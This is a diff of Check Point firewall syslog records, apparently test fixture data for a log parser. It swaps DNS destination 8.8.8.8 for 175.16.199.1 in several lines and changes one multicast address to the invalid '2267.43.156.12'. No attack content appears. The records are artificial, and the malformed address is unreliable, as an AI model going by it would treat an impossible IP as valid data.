 <134>1 2020-03-29T18:28:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e8d4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50746"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -3969,11 +3969,11 @@
 <134>1 2020-03-29T18:32:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e9c5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:32:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e9cd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50169"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:32:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e9cd,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64164"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10230"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33445"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37364"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50738"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42644"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44668"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33445"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37364"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50738"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42644"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44668"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e80e9d5,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; db_ver:"20032905"; description:"Update failed.  Gateway can not access internet (\"https://secureupdates.checkpoint.com/appi/v4_1_1/gw/Version\"). Check connectivity and proxy settings."; product:"Application Control"; severity:"4"; update_status:"failed"]
 <134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e80e9d5,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; db_ver:"20032905"; description:"Update failed.  Gateway can not access internet (\"https://secureupdates.checkpoint.com/appi/v4_1_1/gw/Version\"). Check connectivity and proxy settings."; product:"URL Filtering"; severity:"4"; update_status:"failed"]
 <134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37432"; service:"443"; service_id:"https"; src:"192.168.2.2"]
@@ -3982,7 +3982,7 @@
 <134>1 2020-03-29T18:32:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; log_delay:"1585506775"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37438"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:33:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"393216"; ifdir:"inbound"; ifname:"eth1"; logid:"1"; loguid:"{0x5e80e9e4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58862"; service:"443"; src:"192.168.2.2"; tcp_flags:"FIN-PUSH-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T18:33:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9e3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; log_delay:"1585506787"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37440"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:33:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9e5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50154"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:33:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9e5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50154"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:33:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9e7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32882"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9f0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56248"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:33:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e9f2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -4025,16 +4025,16 @@
 <134>1 2020-03-29T18:42:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50773"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:42:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50774"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:42:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:42:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"2"; service_id:"igmp"; src:"192.168.2.254"]
+<134>1 2020-03-29T18:42:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"2"; service_id:"igmp"; src:"192.168.2.254"]
 <134>1 2020-03-29T18:42:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec21,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
